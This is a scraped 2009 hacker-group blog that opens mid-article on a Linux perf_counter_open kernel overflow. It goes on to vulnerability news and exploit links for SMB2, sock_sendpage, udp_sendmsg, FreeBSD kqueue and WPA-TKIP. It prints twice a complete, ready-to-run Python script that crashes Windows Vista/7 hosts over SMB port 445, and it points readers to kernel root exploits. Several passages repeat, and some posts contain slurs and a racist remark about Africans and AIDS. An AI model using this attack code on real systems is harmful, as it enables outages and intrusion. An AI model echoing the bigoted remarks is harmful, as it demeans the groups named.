4168 ret = get_user(val, addr); // <<< Here.
4169 if (ret)
4170 return ret;
4171 if (val)
4172 goto err_size;
4173 }
4174 }
So now, we can simply change the bytes from userland, into kernel-land with our own content
4175
4176 ret = copy_from_user(attr, uattr, size);
As you can already probably see, by mmap'ing address 0x0, as many upcoming exploits developers have done in recent times would, like so, should be enough for a barebones exploit,
/* Courtesy of Bradley Spengler */
(struct perf_counter_attr *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
When calling the sys_perf_counter_open syscall with these arguments. So, as you can see the bug is a pretty routine buffer overflow. Exploit developers should know their way around, from here, and I must applaud Xiao, for finding this, you have a pretty keen eye ;)
And, here's how the patch for this bug was implemented
...
__user *uattr,
if (val)
goto err_size;
}
+ size = sizeof(*attr);
}
ret = copy_from_user(attr, uattr, size);
....
The race condition can be exploited too, in order to achieve essentially the same results. You could probably read more into exploiting kernel based race conditions, and how to force a kernel path to sleep, in the very well written article written by sgrakkyu and twiz in phrack 64.
Thanks go to bob the builder, redsand and nemo for discussing this and
reviewing this for me (apparently, I can't speak english very well)
~hqi ( hqi <> efnet pe )
ARM announces 2Ghz processor
ARM Architecture has become a dominating force in the world of embedded electronics and most notably, high-end cellular phone products. While Microsoft has chosen to not support the architecture in it's Windows 7, the majority of all the devices using this badass new chip will be Linux based. The new 2Ghz a9-cortex microprocessor should be shipped by the end of 2009, allowing for devices to be released by next year.
http://www.arm.com/
at least your new touchphone wont ever do this.
http://www.arm.com/
at least your new touchphone wont ever do this.
Thursday, September 17, 2009
smb2 vista/7 remote code execution
Security Focus Page with some PoC code.
Daily Dave links to an immunityinc.com page that is only allowing customers to download the working remote and local remote execution exploits for smb2 vuln.
Here is the download site, but a username and passwd is needed to access.
and
Here is the Daily Dave thread.
also these french guys obviously have some good code for it as well. google translate used to convert their blog to english.
check them out!
Daily Dave links to an immunityinc.com page that is only allowing customers to download the working remote and local remote execution exploits for smb2 vuln.
Here is the download site, but a username and passwd is needed to access.
and
Here is the Daily Dave thread.
also these french guys obviously have some good code for it as well. google translate used to convert their blog to english.
check them out!
Wednesday, September 16, 2009
perf_counter_open() local buffer overflow vuln
Linux Kernel 2.6.31-rc1 thru 2.6.31 == vuln;
edited:check out the excellent article written by our own HQI
crappy boundary checks on user data, results in an attacker being able to execute arbitrary code. The security focus advisory says this is not confirmed but this youtube video shows spender running an exploit named "powerglove" and getting dropped a rootshell. It is in his enlightenment framework here, all knitted up nice with these:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] Powerglove: Linux 2.6.31 perf_counter local root
[2] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[3] Wunderbar Emporium: Linux 2.X sendpage() local root
spender after he wrote the 1st
sock_sendpage sploit.
edited:check out the excellent article written by our own HQI
crappy boundary checks on user data, results in an attacker being able to execute arbitrary code. The security focus advisory says this is not confirmed but this youtube video shows spender running an exploit named "powerglove" and getting dropped a rootshell. It is in his enlightenment framework here, all knitted up nice with these:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] Powerglove: Linux 2.6.31 perf_counter local root
[2] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[3] Wunderbar Emporium: Linux 2.X sendpage() local root
spender after he wrote the 1st
sock_sendpage sploit.
Monday, September 14, 2009
OpenSSL vuln
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Dan Kaminsky discovered OpenSSL would still accept certificates with MD2 hash signatures. As a result, an attacker could potentially create a malicious trusted certificate to impersonate another site. This update handles this issue by completely disabling MD2 for certificate validation.
bugtraq link
Sunday, September 13, 2009
Another kqueue() local root vuln w/video
The other kqueue() vuln affecting FreeBSD 6.x - 6.4 STABLE should be disclosed soon now. The FreeBSD security team was notified as early as August 29th, but i guess Frasunek just got a reponse. Przemyslaw Frasunek's blog posted a video of successful exploitation leading to local root, but details will not be released until an official advisory is released. stay tuned
Saturday, September 12, 2009
SMB2 BSOD Proof of Concept C source/JewBacca
i just converted the Python bluescreen Proof of Concept code to C. It was posted to full disclosure a few days ago and has been tested on on many service packs/versions of windows.
no biggie smalls.. i havent tested it really, but here is first draft...
smb2-bsod.c pastebin
and still adding on to the "FINAL sock_sendpage() NULL pointer dereference" post
FINAL sendpage() exploit???
ReDoS?
I can't say i am fan of the coined term "reDoS" but the PDF from http://www.checkmarx.com is damn good.
By "ReDoS" they are referring to "regular expression denial of service". these common bugs have been around for quite a while, but this presentation explores some new ways to exploit it and is worth a read.
Presentation PDF Direct Link.
By "ReDoS" they are referring to "regular expression denial of service". these common bugs have been around for quite a while, but this presentation explores some new ways to exploit it and is worth a read.
Presentation PDF Direct Link.
Friday, September 11, 2009
Apache Zombies on weak ass BotNet
A ton of VPS/dedicated linux servers running Apache have been found to be zombies in a botnet serving malware with a proxy webserver package known as nginx. a few weeks ago, someone found a few twitter accounts being used to control botnets, and just today symantec posted about Google groups being used to do the same with a trojan being called Trojan.Grups.
"The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver."
^ from the register article
"The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver."
^ from the register article
Windows Vista/7 SMB2 Negotiate Protocol Request remote BSOD P.O.C
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
#moded by knife to pass command line arg for IP.. wuttup priv
import sys
from socket import socket
from time import sleep
if (len(sys.argv) >= 2):
host = sys.argv[1], 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be
# "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
else:
sys.exit("Specify an IP.")
HAHA supposedly Microsoft opened this gaping security hole in SMB2 in a patch released in 2007 to fix a different, and less critical vulnerability.
From securityFocus
"Laurent GaffiƩ -- the researcher that disclosed a critical flaw in Microsoft's Server Message Block (SMB) version 2 code earlier this week -- said that further research pinpointed the specific patch that added the vulnerability to Windows Vista. The patch, which fixed a remote execution flaw in SMBv2 signing, was rated Important by Microsoft because the vulnerable feature was not turned on by default. The vulnerability that the patch allegedly introduced could allow an attacker to exploit an affected system in its default configuration, which usually merits a Critical rating from Microsoft."
+++
today a link to http://buglabs.net was posted in our channel. It looks slick and easy to use, and uses an ARM microprocessor. ALL great things, but is it worth it? As a more knowledgable comrad suggested... could you not just buy an ARM development kit such as this one. And if a programmable touchscreen with simple audio in/outs and Linux is all you are after... why not a google development phone? The first android development editions came out late last year, and there is already much support and code. I currently play with the Arduino chip with a shitty ATmega microcontroller, so i am in the market for something of this nature. A lot to consider, but the BugLabs just seems to be gimmicky :( it reminds me of MAC. heh
MORE TO COME ON THIS TOPIC!
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
#moded by knife to pass command line arg for IP.. wuttup priv
import sys
from socket import socket
from time import sleep
if (len(sys.argv) >= 2):
host = sys.argv[1], 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be
# "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
else:
sys.exit("Specify an IP.")
EOF
HAHA supposedly Microsoft opened this gaping security hole in SMB2 in a patch released in 2007 to fix a different, and less critical vulnerability.
From securityFocus
"Laurent GaffiƩ -- the researcher that disclosed a critical flaw in Microsoft's Server Message Block (SMB) version 2 code earlier this week -- said that further research pinpointed the specific patch that added the vulnerability to Windows Vista. The patch, which fixed a remote execution flaw in SMBv2 signing, was rated Important by Microsoft because the vulnerable feature was not turned on by default. The vulnerability that the patch allegedly introduced could allow an attacker to exploit an affected system in its default configuration, which usually merits a Critical rating from Microsoft."
+++
today a link to http://buglabs.net was posted in our channel. It looks slick and easy to use, and uses an ARM microprocessor. ALL great things, but is it worth it? As a more knowledgable comrad suggested... could you not just buy an ARM development kit such as this one. And if a programmable touchscreen with simple audio in/outs and Linux is all you are after... why not a google development phone? The first android development editions came out late last year, and there is already much support and code. I currently play with the Arduino chip with a shitty ATmega microcontroller, so i am in the market for something of this nature. A lot to consider, but the BugLabs just seems to be gimmicky :( it reminds me of MAC. heh
MORE TO COME ON THIS TOPIC!
Thursday, September 10, 2009
Array index error in the SMB2 protocol implementation in srv2.sys in Microsoft Windows 7, Server 2008, and Vista Gold, SP1, and SP2 allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location. NOTE: some of these details are obtained from third party information.
^ from CVE 2009-3103
Although in this CVE candidate it only warns of possible denial of service.. From other sources, primarily the MICROSOFT.COM webiste they warn of possible remote execution of code which could lead to a Conficker like worm that infected millions of computers last year, on to early 2009.
here is the Microsoft advisory which differs is wording from the CVE.
+++
on a lighter note we may have found some hosting overseas for our new dedicated host.
please make some comments if possible fellaz.
http://www.hetzner.de/en/hosting/produkte_rootserver_ds/ds3000/
http://www.isgenug.de/
http://www.hetzner.de/en/hosting/produktmatrix/rootserver-produktmatrix/
^ from CVE 2009-3103
Although in this CVE candidate it only warns of possible denial of service.. From other sources, primarily the MICROSOFT.COM webiste they warn of possible remote execution of code which could lead to a Conficker like worm that infected millions of computers last year, on to early 2009.
here is the Microsoft advisory which differs is wording from the CVE.
+++
on a lighter note we may have found some hosting overseas for our new dedicated host.
please make some comments if possible fellaz.
http://www.hetzner.de/en/hosting/produkte_rootserver_ds/ds3000/
http://www.isgenug.de/
http://www.hetzner.de/en/hosting/produktmatrix/rootserver-produktmatrix/
Wednesday, September 9, 2009
A vuln exists in windows Xp and Vista's TCP flow control. Incorrect handling of zero-windows.
Recurity Labs CVE
and if you wordpress dummies havent updated in the last month, you are vuln to yet another worm that will escalate itself to admin, hide, and spam your blog posts/comments with maleware links etc
security focus link
Recurity Labs CVE
and if you wordpress dummies havent updated in the last month, you are vuln to yet another worm that will escalate itself to admin, hide, and spam your blog posts/comments with maleware links etc
security focus link
Monday, September 7, 2009
the FINAL sock_sendpage() null pointer deref blog post
this is old news now, but everyone has been adding on to their blog posts, and writing more and more shit. hopefully this post will pretty much be a complete list of the serious links surrounding this vuln including exploit code.
here is a pastebin a made of vulnerable distros/kernel versions
Redhat's original article to show the problem in SELinux and mmap_min_addr
cr0.org's advisory
Linux NULL pointer dereference due to incorrect proto_ops initializations on cr0.org (best resource)
RISE security's take of it, but on Power/Cell BE arch
redhat's recommendation on mitigation for the problem.
updated Full Disclosure post
and finally THE PATCH!!! <-- do not download, iz evil +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ and the exploit links *newest to work with COW credentials I.E fedora 11
Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
before Brad's( pretty much same as below)
wunderbar_emporium.tgz
ARM Android exploit
PPC/PPC64/x86_64/i386 exploit
Mixter throwback.
wow, i forgot all about this shlog.c code. such simplicity. write to syslog everytime a shell is invoked along with the source ip. i wonder wtf mixter does these days?!?! probaly a whitefag :(
remember his site http://void.mixter.ru ??? had some great articles back in the day.
an arcade in the Congo. where is amy? me amy. me pretty!
remember his site http://void.mixter.ru ??? had some great articles back in the day.
an arcade in the Congo. where is amy? me amy. me pretty!
sysctl variables and useful OID lists
I see people keep asking for "full lists" of sysctl variables on various forums, so i did a "sysctl -a -d > blah.txt" on 2 systems i have access to and here are the text files. note that these will vary from system to system.
sysctl -a -d on a FreeBSD 7.0-RELEASE-p11
sysctl -a -d on a Linux 2.6.18-128.1.1.el5.028stab062.3
This made me think of the neat OIDs to be used with SNMP(simple network management protocol) you can use snmpwalk like this
snmpwalk -v [snmp_version] -c [community] [ip_address][object id]
Here is a list of OIDs found on another site
CPU
Percentages of user CPU time (ssCpuUser)
Percentages of system CPU time (ssCpuSystem)
Percentages of idle CPU time (ssCpuIdle)
sysctl -a -d on a FreeBSD 7.0-RELEASE-p11
sysctl -a -d on a Linux 2.6.18-128.1.1.el5.028stab062.3
This made me think of the neat OIDs to be used with SNMP(simple network management protocol) you can use snmpwalk like this
snmpwalk -v [snmp_version] -c [community] [ip_address][object id]
Here is a list of OIDs found on another site
CPU
Percentages of user CPU time (ssCpuUser)
.1.3.6.1.4.1.2021.11.9Percentages of system CPU time (ssCpuSystem)
.1.3.6.1.4.1.2021.11.10Percentages of idle CPU time (ssCpuIdle)
.1.3.6.1.4.1.2021.11.11 Load
1 minute Load (laLoad.1).1.3.6.1.4.1.2021.10.1.3.1
5 minute Load (laLoad.2).1.3.6.1.4.1.2021.10.1.3.2
15 minute Load (laLoad.3).1.3.6.1.4.1.2021.10.1.3.3
Memory
Total Swap Size configured for the host (memTotalSwap).1.3.6.1.4.1.2021.4.3
Available Swap Space on the host (memAvailSwap)
.1.3.6.1.4.1.2021.4.4
Total Real/Physical Memory Size on the host (memTotalReal).1.3.6.1.4.1.2021.4.5
Available Real/Physical Memory Space on the host (memAvailReal).1.3.6.1.4.1.2021.4.6
Total RAM Free (memTotalFree).1.3.6.1.4.1.2021.4.11.0
Total RAM Shared (memShared).1.3.6.1.4.1.2021.4.13.0
Total RAM Buffered (memBuffer).1.3.6.1.4.1.2021.4.14.0
Total Cached Memory (memCached).1.3.6.1.4.1.2021.4.15.0
Disks
Disks names (ns-disk-1-name).1.3.6.1.4.1.2021.9.1.2
Disks avalaible space (ns-disk-1-avail).1.3.6.1.4.1.2021.9.1.7
Disks used space (ns-disk-1-used).1.3.6.1.4.1.2021.9.1.8
Disks use % (ns-disk-1-pct).1.3.6.1.4.1.2021.9.1.9
Note:
The snmpd.conf needs to be edited. Add the following (assuming a machine with a "/" and "/boot" partitions):
disk /
disk /boot
Interfaces
Interfaces Input Octets (ifInOctets).1.3.6.1.2.1.2.2.1.10
Interfaces Input Errors (ifInErrors).1.3.6.1.2.1.2.2.1.14
Interfaces Output Octets (ifOutOctets).1.3.6.1.2.1.2.2.1.16
Interfaces Output Errors (ifOutErrors).1.3.6.1.2.1.2.2.1.20
WPA crack in 60 seconds? and Conficker owns London council.
the article about the beck-Tews attack on WPA-TKIP was dropped last november slicing the time it takes to crack a WPA encrypted key down to "12-15" minutes. "Beck-Tews" is actually just referring to the "chopchop" method that has been applied to WEP in the past. It grabs a MIC(message Integrity Check) Key and plaintext from an encrypted short packet(a packet with an empty user data field) and falsifies it using the MIC key. Basically this works in WEP because of an insecure checksum where one can guess individual bytes of a packet and the access point will send an error msg if it is incorrect. If you do not recv an error msg, than you know you have guessed correctly, rendering this a simple matter of brute force.
In short WPA uses Time Stamp Counters and you are led to believe this would make an attack of this nature impossible. The initialization vector is checked in WPA... but no, if the victim uses QoS(Quality of Service) features then you have 8 channels of data flow and each has a unique time stamp. In this case you can grab an encrypted packet and execute the chopchop attack on a different channel. the only thing slowing you down is the amount of MPDU's(MAC Protocol Data Units) that are broken down from the MSVU + MIC Key, seeing as how there is a checksum for each one. This is why we focus on the short packet(ARP & DNS) as it does not cause the fragmenation.
This still doesnt help much against WPA unless the victim is using QoS. The solution is to apply this technique to a Man-in-The-Middle attack. if you were to hijack an encrypted ARP packet en-route to the access point.. the Initialization Vector would be larger than the Time Stamp Counter has used , because it hasnt reached its destination yet. This obviously allowing for the chopchop method to be used. Now it is a matter of you basically setting up your station as a repeater to relay all other information that should hit the destination from original without modification and falsifying the specific packets needed. If you use directional antennas there is less chance of your malicious activity ever being noticed!
In Toshihiro Ohigashi and Masakatu Morii's paper entitled "A Practical Message Falsification Attack on WPA" they explain strategies even further than this to cut down the time to a said ONE MINUTE.
my references include the above paper, the temporal key integrity protocol: beck-tews wikipedia entry, the ZDNet blog entry from November of last year, and the recent blog entry that claimed 60 seconds.
I will end by saying this... only clueless hippy girls that just aquired a router for the first time use WEP, and now that this information is widely available, is it equally as stupid not to switch over to WPA2.
___
here is some news that made me p00p a little.
LONDON COUNCIL INFECTED BY CONFICKER!
"An Ealing council employee infected the UK local authority's IT systems with the Conficker-D worm after he plugged an infected USB into a work computer, causing tens of thousands of pounds in damages in the process."
and this only makes me wonder if some guy in .ru is controlling his newest botnet recruits with twitter. article on botnets using twitter!
and isnt this ironic that some guys ddos;ed twitter with their botnets recently? this also reminded me of the hype of conficker when it first hit. look at this map and take note where the infections are NOT at. i think africans are a bunch of a hakkir sleeper cells. Look at this animated movie of the spread of infection. Remind you of something?? AIDS maybe?
all bullshit aside, i just hope mosthated's best buddy kevin mitnick gets his internets back
Sunday, September 6, 2009
<@`acdc> oh, too bad
<@`acdc> that null pointer deref for bsd is for <= 6.1
+++
the vuln/exploit referred to here(proto_ops and kqueue.txt) has been in the wild for about 2 weeks now.
Below is from the Full Disclosure post in August 2009
the reason for this post is to point out that Przemyslaw Frasunek (hot damn what a crazy name) said on his blog
QUOTE
"yet another local root vulnerability in freebsd 6.4 kernel (will be disclosed in two weeks)" ENDQUOTE
i have no idea when this was posted but check it out for yourself
CRAZY NAMED GUYS SITE
<@`acdc> that null pointer deref for bsd is for <= 6.1
+++
the vuln/exploit referred to here(proto_ops and kqueue.txt) has been in the wild for about 2 weeks now.
Below is from the Full Disclosure post in August 2009
FreeBSD <= 6.1 suffers from classical check/use race condition on systems in kevent()
syscall, leading to kernel mode NULL pointer dereference. It can be triggered by
spawning two threads: 1st thread looping on open() and close() syscalls, and the 2nd
thread looping on kevent(), trying to add possibly invalid filedescriptor. The bug
was fixed in 6.1-STABLE, just before release of 6.2-RELEASE, but was not recognized
as security vulnerability.
the reason for this post is to point out that Przemyslaw Frasunek (hot damn what a crazy name) said on his blog
QUOTE
"yet another local root vulnerability in freebsd 6.4 kernel (will be disclosed in two weeks)" ENDQUOTE
i have no idea when this was posted but check it out for yourself
CRAZY NAMED GUYS SITE
quad, hacking 7, and some random papers on malware and networking
as you know, my homeslice acdc is now one of the main admins of quad and we are running gentoo now. this box will continue to serve as a shellhost(primarily for irc) but a new VPS or dedicated host should be up in the near future that will cater to our more special needs. contact me, oc80z or acdc to get pricing and/or details.
and before i get to interesting things like the number 7, check out theopen source projects that http://www.coresecurity.com has going on!@#$
One of my favorites is the HeapDraw now known as HeapTrace. self-explanatory.. it graphic of a process as it evolves. pretty neat eh? there is nix and windows native installs so check it out.
now Hacking the magical number 7 .. the title made me immediately think of unix permissions numbers and how 1 , 2 , and 4 can all be summed together in any combination to result in a unique integer. now that is magic! not really, and the article is actually about memory.
"Our short term memory is widely believed to have a capacity of seven elements, plus or minus 2. This assumption has influenced a number of major decisions — it’s the reason that U.S. phone numbers have seven digits, for example."
check this video, this guy is nutz...
___
after reading "A Practical Message Falsification Attack on WPA" i checked to see if the containing dir allowed for listing. some of it worthless but here is a random dir of papers.
and before i get to interesting things like the number 7, check out theopen source projects that http://www.coresecurity.com has going on!@#$
One of my favorites is the HeapDraw now known as HeapTrace. self-explanatory.. it graphic of a process as it evolves. pretty neat eh? there is nix and windows native installs so check it out.
now Hacking the magical number 7 .. the title made me immediately think of unix permissions numbers and how 1 , 2 , and 4 can all be summed together in any combination to result in a unique integer. now that is magic! not really, and the article is actually about memory.
"Our short term memory is widely believed to have a capacity of seven elements, plus or minus 2. This assumption has influenced a number of major decisions — it’s the reason that U.S. phone numbers have seven digits, for example."
check this video, this guy is nutz...
___
after reading "A Practical Message Falsification Attack on WPA" i checked to see if the containing dir allowed for listing. some of it worthless but here is a random dir of papers.
Vulnerabilities in the SILC protocol
Obviously we need to start looking into some proof-of-concept code, and i am no whitefag trying to get the world to update, but to all your priv8teerz that own your own VPS' and dedi hosts, here is the security focus link of the advisory and update information.
Basically it is a format string vulnerability in a sscanf() function call in the HTTP part of SILCd that could allow execution of arbitrary code. no need to update silc-server.. just silc-client and silc-toolkit.
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7-2+lenny1.dsc
Size/MD5 checksum: 1430 eff8a733cf7e4db92296533394f42b22
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7.orig.tar.gz
Size/MD5 checksum: 2678989 4f2fa6678f4801fd7087b4f92dada6ee
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7-2+lenny1.diff.gz
Size/MD5 checksum: 16935 1e5d1151029379a7ba135799dc1cd166
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4-1+lenny1.dsc
Size/MD5 checksum: 1380 29601c3569b30b5e3d3307689c9c25f8
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4.orig.tar.gz
Size/MD5 checksum: 2202993 979d46c78ace2dade513f33ad0081e85
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4-1+lenny1.diff.gz
Size/MD5 checksum: 11593 efa43890947e5ba7a34631c689abcb60
there is the source links, and the rest for different archs are on the security focus page.
-builder
Basically it is a format string vulnerability in a sscanf() function call in the HTTP part of SILCd that could allow execution of arbitrary code. no need to update silc-server.. just silc-client and silc-toolkit.
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7-2+lenny1.dsc
Size/MD5 checksum: 1430 eff8a733cf7e4db92296533394f42b22
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7.orig.tar.gz
Size/MD5 checksum: 2678989 4f2fa6678f4801fd7087b4f92dada6ee
http://security.debian.org/pool/updates/main/s/silc-toolkit/silc-toolkit
_1.1.7-2+lenny1.diff.gz
Size/MD5 checksum: 16935 1e5d1151029379a7ba135799dc1cd166
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4-1+lenny1.dsc
Size/MD5 checksum: 1380 29601c3569b30b5e3d3307689c9c25f8
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4.orig.tar.gz
Size/MD5 checksum: 2202993 979d46c78ace2dade513f33ad0081e85
http://security.debian.org/pool/updates/main/s/silc-client/silc-client_1
.1.4-1+lenny1.diff.gz
Size/MD5 checksum: 11593 efa43890947e5ba7a34631c689abcb60
there is the source links, and the rest for different archs are on the security focus page.
-builder
2 recent vulnerability explanations
The first is in udp_sendmsg() and affects kernels 2.6 - 2.6.19
an exploit was posted to milw0rm first here and then another here.
finally a really good package came out called "The Rebel" and even included a nifty shell script. here is the head!
/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything
At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/
the problem in udp_sendmsg() is that rt routing table is initialized as NULL and in certain situations ip_append_data() could be called with a NULL rt causing a NULL pointer dereference! (thank you cr0 for pointing this out)
here is a patch that should make ip_append_data() handle this better.
the explanation at the cr0 blog is very in depth and worth a read.
___
the second is in the linux kernel getname() function which gets information about a socket. This information is stored in the form of sockaddr struct and is accessed by userspace by getsockname(2) and getpeername(2) system calls. the problem lies in that uninitialized/non memset()'ed data will be returned from the stack to userspace.
examples of this:
AF_IRDA Exploit
AF_LLC Exploit
and Clement Lecigne’s AF_APPLETALK exploit at milw0rm
and here is Jon Oberheide's excellent overview including af_irda example code.
an exploit was posted to milw0rm first here and then another here.
finally a really good package came out called "The Rebel" and even included a nifty shell script. here is the head!
/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything
At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/
the problem in udp_sendmsg() is that rt routing table is initialized as NULL and in certain situations ip_append_data() could be called with a NULL rt causing a NULL pointer dereference! (thank you cr0 for pointing this out)
here is a patch that should make ip_append_data() handle this better.
the explanation at the cr0 blog is very in depth and worth a read.
the second is in the linux kernel getname() function which gets information about a socket. This information is stored in the form of sockaddr struct and is accessed by userspace by getsockname(2) and getpeername(2) system calls. the problem lies in that uninitialized/non memset()'ed data will be returned from the stack to userspace.
examples of this:
AF_IRDA Exploit
AF_LLC Exploit
and Clement Lecigne’s AF_APPLETALK exploit at milw0rm
and here is Jon Oberheide's excellent overview including af_irda example code.
numero uno
I am creating this for an easy way for us to share links. probaly more, nothing less. For anyone who isn't familiar with our community, fuck off.
Hopefully i get some help from you guys, especially with finding/posting news -1day, but most definitely getting the links on the right side to be massive and up-to-date. General papers, official sites,tutorials etc etc. We will use the blog for more specific stuff, but the side will be more rudimentary, so excuse the lameness of some. its for reference not n00bs
I am always down to throw in some lulz, but as you know most of this will be infosec, vuln-dev, networking, and coding information and links.
and here is the first "cool guy of the week"
MJ FTW
-shekk AKA builder
Hopefully i get some help from you guys, especially with finding/posting news -1day, but most definitely getting the links on the right side to be massive and up-to-date. General papers, official sites,tutorials etc etc. We will use the blog for more specific stuff, but the side will be more rudimentary, so excuse the lameness of some. its for reference not n00bs
I am always down to throw in some lulz, but as you know most of this will be infosec, vuln-dev, networking, and coding information and links.
and here is the first "cool guy of the week"
MJ FTW
-shekk AKA builder
Subscribe to:
Posts (Atom)